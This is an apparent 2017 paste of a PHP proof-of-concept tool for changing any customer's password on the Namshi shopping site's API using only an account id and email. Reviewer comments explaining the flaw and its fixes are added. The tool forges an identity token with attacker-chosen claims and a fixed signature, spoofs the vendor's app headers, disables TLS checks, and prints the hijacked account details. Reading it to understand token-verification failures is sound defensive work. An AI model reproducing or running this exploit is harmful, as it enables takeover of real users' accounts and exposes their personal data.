BugAR

Change the password of any account [Nmshi] via [id+email]

Apr 14th, 2017
  <!--
    Review note (defensive reading). Per the paste title, this is a proof of
    concept for changing the password of another customer's account from only
    the account id and e-mail address. The form collects those two values plus
    the new password; the PHP part then sends a single PUT request carrying an
    identity cookie whose claims segment is built from the form input.
    The placeholder on the id field is Arabic for "consists of 7 digits".
    NOTE(review): an id of that kind should not be treated as a secret, so
    authorization cannot rest on knowing it.
  -->
  1. <center>
  2. Boooom[Nmshi] by 1377r00t
  3. <form method="POST" action="">
  4. Email :<input name="email" type="text"><br>
  5. Id :<input name="id" type="text" value="يتكون من 7 ارقام"><br>
  6. New Password : <input name="password" type="text"><br>
  7. <input type="submit" value="Logged">
  8. </center>
  9. </form>
  10. <?
      // All three values come straight from the submitted form and are used
      // below without any validation.
  11. $email = $_POST['email'];
  12. $id = $_POST['id'];
  13. $password = $_POST['password'];
      // Claims segment of the identity token, assembled as plain JSON text:
      // "username" and "customerId" are whatever was typed into the form.
      // exp is 5,184,000 s (60 days) after iat.
      // NOTE(review): a server must not read any of these claims until it has
      // verified the token signature over the exact header.payload bytes it
      // received; a shorter token lifetime also narrows the exposure window.
  14. $base64 = ('
  15. {
  16.  "username": "'.$email.'",
  17.  "roles": [
  18.    "ROLE_CUSTOMER",
  19.    "ROLE_CUSTOMER"
  20.  ],
  21.  "customerId": '.$id.',
  22.  "exp": 1497353545,
  23.  "iat": 1492169545
  24. }');
      // Despite the variable name, the JSON is URL-encoded here, not
      // base64url-encoded.
      // NOTE(review): a strict token parser rejects a segment that is not valid
      // base64url; percent-encoded characters inside an identity cookie segment
      // are worth logging and alerting on.
  25. $encoded = urlencode($base64);
  26. $ch = curl_init();
      // The customer id in the request path is the same form value that was
      // written into the "customerId" claim above.
      // NOTE(review): server-side, the path id has to be authorized against the
      // subject of a *verified* token, and a password change should also demand
      // the current password or a fresh re-authentication.
  27. curl_setopt($ch, CURLOPT_URL, "https://my.namshi.com/api/jerry/customers/$id.json");
      // TLS certificate verification is switched off for this request.
  28. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  29. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  30. curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "PUT");
  31. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
      // Fixed header set written to look like the vendor's Android WebView client
      // (User-Agent, X-Requested-With, Referer of the password-change page).
      // NOTE(review): none of these headers authenticate anything; they must not
      // be used as a trust signal by the API.
  32. curl_setopt($ch, CURLOPT_HTTPHEADER, array(
  33.     'Host: my.namshi.com',
  34.     'Connection: keep-alive',
  35.     'Content-Length: 22',
  36.     'n-tenant: namshi',
  37.     'Accept: application/json',
  38.     'Origin: https://my.namshi.com',
  39.     'n-locale: ar_SA',
  40.     'User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900F Build/LRX21T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/56.0.2924.87 Mobile Safari/537.36',
  41.     'Content-type: application/json',
  42.     'Referer: https://my.namshi.com/password/change',
  43.     'Accept-Encoding: gzip, deflate',
  44.     'Accept-Language: ar-AE,en-US;q=0.8',
      // identity cookie = constant header segment + the claims built above +
      // a constant signature segment. The header segment decodes to
      // {"alg":"RS256","typ":"JWS"}. A constant signature cannot match claims
      // that change with every form submission.
      // NOTE(review): if the endpoint accepted such a cookie, signature
      // verification was presumably absent or not bound to the payload at the
      // time; this page alone cannot confirm it. The control is to verify the
      // signature with a pinned algorithm and key before any claim is trusted,
      // and to alert on identity cookies that fail verification.
  45.     'Cookie: identity=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXUyJ9.'.$encoded.'.K44hBhxQJf6wwwEndEidJmVyOKj-heelzjNujHNnU01D-TERVGgOtl5wMA3Q5297C3WrcxenvY0Kdsd_Dcc4zi5kT3W4j8PhWxpAn79V88_IHbYCS94I4Pc8DmKrJp_aEfcJPNcKmGYvJvCMmHUvRgOo70TPCbg76nX-JEoR3n4; locale-v1=ar_SA',
  46.     'X-Requested-With: com.namshi.android'
  47.     ));
      // The request body carries the new password taken from the form.
  48. curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query('{"password":"'.$password.'"}'));
      // Response headers are included in the text returned by curl_exec().
  49. curl_setopt($ch, CURLOPT_HEADER, 1);
      // curl's User-Agent option is set from the browser that submitted the form.
  50. curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  51. $check = curl_exec($ch);
      // The next two sections cut an id and an e-mail address out of the raw
      // response by splitting on fixed JSON fragments.
      // NOTE(review): the fragments searched for suggest the response to this PUT
      // echoed customer profile fields (phone record, email, firstName); confirm
      // against the API. A password-change response has no need to return them.
  52. ///////////////////////////////////////////
  53. $startid = explode('{"lastUpdatedPhone":{"id":' , $check );
  54. $endid = explode(',"number":"' , $startid[1] );
  55. $iduser = $endid[0];
  56. ///////////////////////////////////////////
  57. $startemail = explode(',"email":"' , $check );
  58. $endemail = explode('","firstName":"' , $startemail[1] );
  59. $emailuser = $endemail[0];
  60. ///////////////////////////////////////////
      // Writes the extracted id, the submitted password and the complete raw
      // response into the page without HTML escaping.
  61. echo '
  62. <center>
  63. <br>
  64. Cracked :-<br>
  65. Id : '.$iduser.'<br>
  66. Email : '.$iduser.'<br>
  67. Password : '.$password.'<br>
  68. Good Bye<br>(Twitter:1337r00t)<br>(Instagram:1337r00t)<br>'.$check.'
  69. </center>
  70. ';